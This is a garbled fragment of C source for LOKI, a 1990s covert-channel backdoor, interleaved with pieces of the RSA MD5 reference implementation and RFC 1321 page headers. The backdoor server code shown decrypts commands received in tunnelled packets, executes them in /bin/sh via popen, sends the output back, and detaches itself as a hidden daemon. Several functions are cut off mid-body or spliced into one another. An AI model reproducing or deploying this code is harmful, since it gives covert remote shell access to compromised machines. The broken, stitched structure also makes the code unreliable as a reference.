if (verbose) fprintf(stderr, "nlokid: extracting 128-bit blowfish key");
/* Try to add client to client list */
if (((c = add_client(extract_bf_key(buf1, NOK))) == -1))
{
#else
if (((c = add_client((u_char *)NULL)) == -1))
{
#endif /* MAX_CLIENT limit reached */
lokid_xmit(S_MSG_PACKED, LP_DST, L_ERR, NOCR);
lokid_xmit(buf1, LP_DST, L_EOT, NOCR);
err_exit(1, 0, verbose, "nlokid: Cannot add keyn");
}
#ifdef STRONG_CRYPTO
if (verbose)
{
fprintf(stderr, "nlokid: client <%d> added to list [%d]", c_id, c);
fprintf(stderr, "nlokid: submiting my public key to client");
} /* send our public key to the client */
bzero((u_char *)buf1, BUFSIZE);
BN_bn2bin((BIGNUM *)dh_keypair -> pub_key, buf1);
lokid_xmit(buf1, LP_DST, L_PK_REPLY, NOCR);
lokid_xmit(buf1, LP_DST, L_EOT, NOCR);
clean_exit(0);
}
bzero((u_char *)buf1, BUFSIZE);
/* Control falls here when we have
* a regular request packet.
*/
if ((c_ind = locate_client(FIND)) == -1)
{ /* Cannot locate the client's entry */
lokid_xmit(S_MSG_UNKNOWN, LP_DST, L_ERR, NOCR);
lokid_xmit(buf1, LP_DST, L_EOT, NOCR);
err_exit(1, 0, verbose, S_MSG_UNKNOWN);
} /* set expanded blowfish key */
else BF_set_key(&bf_key, BF_KEYSIZE, user_key);
#endif
/* unload payload */
bcopy(&rdg.payload[1], buf1, BUFSIZE - 1);
#ifdef STRONG_CRYPTO
/* The IV salt is incremented in the
* client prior to encryption, ergo
* the server should increment before
* decrypting
*/
ivec_salt = update_client_salt(c_ind);
#endif
blur(DECR, BUFSIZE - 1, buf1);
/* parse escaped command */
if (buf1[0] == '/') d_parse(buf1, pid, ripsock);
#ifdef POPEN /* popen the shell command and execute
* it inside of /bin/sh
*/
if (!(job = popen(buf1, "r")))
err_exit(1, 1, verbose, "nlokid: popen");
while (fgets(buf2, BUFSIZE - 1, job))
{
bcopy(buf2, buf1, BUFSIZE);
lokid_xmit(buf1, LP_DST, L_REPLY, OKCR);
}
lokid_xmit(buf1, LP_DST, L_EOT, OKCR);
#ifdef STRONG_CRYPTO
update_client(c_ind, p_sent, b_sent);
#else
update_client(locate_client(FIND), p_sent, b_sent);
#endif
clean_exit(0); /* exit the child after sending
* the last packet
*/
#endif
#ifdef PTY /* Not implemented yet */
fprintf(stderr, "nmfd: %d", mfd);
#endif
}
}
}
/*
* Build and transmit Loki packets (server-side version)
*/
int lokid_xmit(u_char *payload, u_long dst, int ptype, int crypt_flag)
{
struct sockaddr_in sin;
int i = 0;
bzero((struct loki *)&sdg, LOKIP_SIZE);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = dst;
sdg.payload[0] = ptype; /* set packet type */
/* Do not encrypt error or public
* key reply packets
*/
if (crypt_flag == OKCR) blur(ENCR, BUFSIZE - 1, payload);
bcopy(payload, &sdg.payload[1], BUFSIZE - 1);
void d_parse(u_char *buf, pid_t pid, int ripsock)
{
u_char buf2[4 * BUFSIZE] = {0};
int n = 0, m = 0;
u_long client_ip = 0;
/* client request for an all kill */
if (!strncmp(buf, QUIT_ALL, sizeof(QUIT_ALL) - 1))
{
if (verbose) fprintf(stderr, "nlokid: client <%d> requested an all killn", c_id);
while (n < MAX_CLIENT) /* send notification to all clients */
{
if ((client_ip = check_client_ip(n++, &c_id)))
{
if (verbose) fprintf(stderr, "tsending L_QUIT: <%d> %sn", c_id, host_lookup(client_ip));
lokid_xmit(buf, client_ip, L_QUIT, NOCR);
}
}
if (verbose) fprintf(stderr, S_MSG_CLIENTK);
/* send a SIGKILL to all the processes
* in the servers group...
*/
if ((kill(-pid, SIGKILL)) == -1)
err_exit(1, 1, verbose, "[fatal] could not signal process group");
clean_exit(0);
}
/* client is exited, remove entry
* from the client list
*/
if (!strncmp(buf, QUIT_C, sizeof(QUIT_C) - 1))
{
if ((m = locate_client(DESTROY)) == -1)
err_exit(1, 0, verbose, S_MSG_UNKNOWN);
else if (verbose) fprintf(stderr, "nlokid: client <%d> freed from list [%d]", c_id, m);
clean_exit(0);
}
/* stat request */
if (!strncmp(buf, STAT_C, sizeof(STAT_C) - 1))
{
bzero((u_char *)buf2, 4 * BUFSIZE);
/* Ok. This is an ugly hack to keep
* packet counts in sync with the
* stat request. We know the amount
* of packets we are going to send (and
* therefore the byte count) in advance
* so we can preload the values.
*/
update_client(locate_client(FIND), 5, 5 * LOKIP_SIZE);
n = stat_client(locate_client(FIND), buf2, prot, uptime);
/* breakdown payload into BUFSIZE-1
* chunks, suitable for transmission
*/
for (; m < n; m += (BUFSIZE - 1))
{
bcopy(&buf2[m], buf, BUFSIZE - 1);
lokid_xmit(buf, LP_DST, L_REPLY, OKCR);
}
lokid_xmit(buf, LP_DST, L_EOT, OKCR);
clean_exit(0); /* exit the child after sending
* the last packet
*/
}
#ifndef STRONG_CRYPTO /* signal parent to change protocols */
if (!strncmp(buf, SWAP_T, sizeof(SWAP_T) - 1))
{
if (kill(getppid(), SIGUSR1))
err_exit(1, 1, verbose, "[fatal] could not signal parent");
clean_exit(0);
}
#endif
/* unsupport/unrecognized command */
lokid_xmit(S_MSG_UNSUP, LP_DST, L_REPLY, OKCR);
lokid_xmit(buf2, LP_DST, L_EOT, OKCR);
/* PROTOTYPES should be set to one if and only if the compiler supports
function argument prototyping.
The following makes PROTOTYPES default to 0 if it has not already
Rivest [Page 7]
RFC 1321 MD5 Message-Digest Algorithm April 1992
been defined with C compiler flags.
*/
#ifndef PROTOTYPES
#define PROTOTYPES 0
#endif
/* POINTER defines a generic pointer type */
typedef unsigned char *POINTER;
/* UINT2 defines a two byte word */
typedef unsigned short int UINT2;
/* UINT4 defines a four byte word */
typedef unsigned long int UINT4;
/* PROTO_LIST is defined depending on how PROTOTYPES is defined above.
If using PROTOTYPES, then PROTO_LIST returns the list, otherwise it
returns an empty list.
*/
#if PROTOTYPES
#define PROTO_LIST(list) list
#else
#define PROTO_LIST(list) ()
#endif
<--> md5/global.h
<++> L2/md5/md5.h
/* MD5.H - header file for MD5C.C
*/
/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
rights reserved.
License to copy and use this software is granted provided that it
is identified as the "RSA Data Security, Inc. MD5 Message-Digest
Algorithm" in all material mentioning or referencing this software
or this function.
License is also granted to make and use derivative works provided
that such works are identified as "derived from the RSA Data
Security, Inc. MD5 Message-Digest Algorithm" in all material
mentioning or referencing the derived work.
RSA Data Security, Inc. makes no representations concerning either
the merchantability of this software or the suitability of this
software for any particular purpose. It is provided "as is"
without express or implied warranty of any kind.
Rivest [Page 8]
RFC 1321 MD5 Message-Digest Algorithm April 1992
These notices must be retained in any copies of any part of this
documentation and/or software.
*/
/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
rights reserved.
License to copy and use this software is granted provided that it
is identified as the "RSA Data Security, Inc. MD5 Message-Digest
Algorithm" in all material mentioning or referencing this software
or this function.
License is also granted to make and use derivative works provided
that such works are identified as "derived from the RSA Data
Security, Inc. MD5 Message-Digest Algorithm" in all material
mentioning or referencing the derived work.
RSA Data Security, Inc. makes no representations concerning either
the merchantability of this software or the suitability of this
software for any particular purpose. It is provided "as is"
without express or implied warranty of any kind.
These notices must be retained in any copies of any part of this
documentation and/or software.
*/
#include "global.h"
#include "md5.h"
/* Constants for MD5Transform routine.
*/
/*
Rivest [Page 9]
RFC 1321 MD5 Message-Digest Algorithm April 1992
*/
/* Transform as many times as possible.
*/
if (inputLen >= partLen) {
MD5_memcpy
((POINTER)&context->buffer[index], (POINTER)input, partLen);
MD5Transform (context->state, context->buffer);
for (i = partLen; i + 63 < inputLen; i += 64)
MD5Transform (context->state, &input[i]);
/* MD5 basic transformation. Transforms state based on block.
*/
static void MD5Transform (state, block)
UINT4 state[4];
unsigned char block[64];
{
UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16];
/* Encodes input (UINT4) into output (unsigned char). Assumes len is
a multiple of 4.
*/
static void Encode (output, input, len)
unsigned char *output;
UINT4 *input;
unsigned int len;
{
unsigned int i, j;
/* Decodes input (unsigned char) into output (UINT4). Assumes len is
a multiple of 4.
*/
static void Decode (output, input, len)
UINT4 *output;
unsigned char *input;
unsigned int len;
{
unsigned int i, j;
/* Note: Replace "for loop" with standard memcpy if possible.
*/
static void MD5_memcpy (output, input, len)
POINTER output;
POINTER input;
unsigned int len;
{
unsigned int i;
for (i = 0; i < len; i++)
/*
Rivest [Page 15]
RFC 1321 MD5 Message-Digest Algorithm April 1992
*/
output[i] = input[i];
}
/* Note: Replace "for loop" with standard memset if possible.
*/
static void MD5_memset (output, value, len)
POINTER output;
int value;
unsigned int len;
{
unsigned int i;
for (i = 0; i < len; i++)
((char *)output)[i] = (char)value;
}
<--> md5/md5c.c
<++> L2/pty.c
/*
* LOKI
*
* [ pty.c ]
*
* 1996/7 Guild Corporation Worldwide [daemon9]
* All the PTY code ganked from Stevens.
*/
#ifdef PTY
#include "loki.h"
extern int verbose;
/*
* Open a pty and establish it as the session leader with a
* controlling terminal
*/
#define WORKING_ROOT "/tmp" /* Sometimes we make mistakes.
* Sometimes we execute commands we
* didn't mean to. `rm -rf` is much
* easier to palate from /tmp
*/
/*
* Domain names / dotted-decimals --> network byte order.
*/
u_long name_resolve(char *hostname)
{
struct in_addr addr;
struct hostent *hostEnt;
/* name lookup failure */
if ((addr.s_addr = inet_addr(hostname)) == -1)
{
if (!(hostEnt = gethostbyname(hostname)))
err_exit(1, 1, verbose, "n[fatal] name lookup failed");
bcopy(hostEnt->h_addr, (char *)&addr.s_addr, hostEnt -> h_length);
}
return (addr.s_addr);
}
register long sum = 0;
u_short oddbyte = 0;
register u_short answer = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) =* (u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
#endif /* X86FAST_CHECK */
/*
* Generic exit with error function. If checkerrno is true, errno should
* be looked at and we call perror, otherwise, just dump to stderr.
* Additionally, we have the option of suppressing the error messages by
* zeroing verbose.
*/
void err_exit(int exitstatus, int checkerrno, int verbalkint, char *errstr)
{
if (verbalkint)
{
if (checkerrno) perror(errstr);
else fprintf(stderr, errstr);
}
clean_exit(exitstatus);
}
/*
* SIGALRM signal handler. We reset the alarm timer and default signal
* signal handler, then restore our stack frame from the point that
* setjmp() was called.
*/
void catch_timeout(int signo)
{
alarm(0); /* reset alarm timer */
/* reset SIGALRM, our handler will
* be again set after we longjmp()
*/
if (signal(SIGALRM, catch_timeout) == SIG_ERR)
err_exit(1, 1, verbose, L_MSG_SIGALRM);
/* restore environment */
longjmp(env, 1);
}
/*
* Clean exit handler
*/
void clean_exit(int status)
{
extern int tsock;
extern int ripsock;
close(ripsock);
close(tsock);
exit(status);
}
/*
* Keep child proccesses from zombiing on us
*/
void reaper(int signo)
{
int sys = 0;
wait(&sys); /* get child's exit status */
/* re-establish signal handler */
if (signal(SIGCHLD, reaper) == SIG_ERR)
err_exit(1, 1, verbose, L_MSG_SIGCHLD);
}
/*
* Simple daemonizing procedure.
*/
void shadow()
{
extern int errno;
int fd = 0;
close(STDIN_FILENO); /* We no longer need STDIN */
if (!verbose)
{ /* Get rid of these also */
close(STDOUT_FILENO);
close(STDERR_FILENO);
}
/* Ignore read/write signals from/to
* the controlling terminal.
*/
signal(SIGTTOU, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGTSTP, SIG_IGN); /* Ignore suspend signal. */
switch (fork())
{
case 0: /* child continues */
break;
default: /* parent exits */
clean_exit(0);
case -1: /* fork error */
err_exit(1, 1, verbose, "[fatal] Cannot go daemon");
}
/* Create a new session and set this
* process to be the group leader.
*/
if (setsid() == -1)
err_exit(1, 1, verbose, "[fatal] Cannot create session");
/* Detach from controlling terminal */
if ((fd = open("/dev/tty", O_RDWR)) >= 0)
{
if ((ioctl(fd, TIOCNOTTY, (char *)NULL)) == -1)
err_exit(1, 1, verbose, "[fatal] cannot detach from controlling terminal");
close(fd);
}
errno = 0;
chdir(WORKING_ROOT); /* Working dir should be the root */
umask(0); /* File creation mask should be 0 */
}
#ifdef DEBUG
/*
* Bulk of this function taken from Stevens APUE...
* got this from Mooks (LTC)
*/
void fd_status(int fd, int newline)
{
int accmode = 0, val = 0;
t
")) != EOF)
Vova
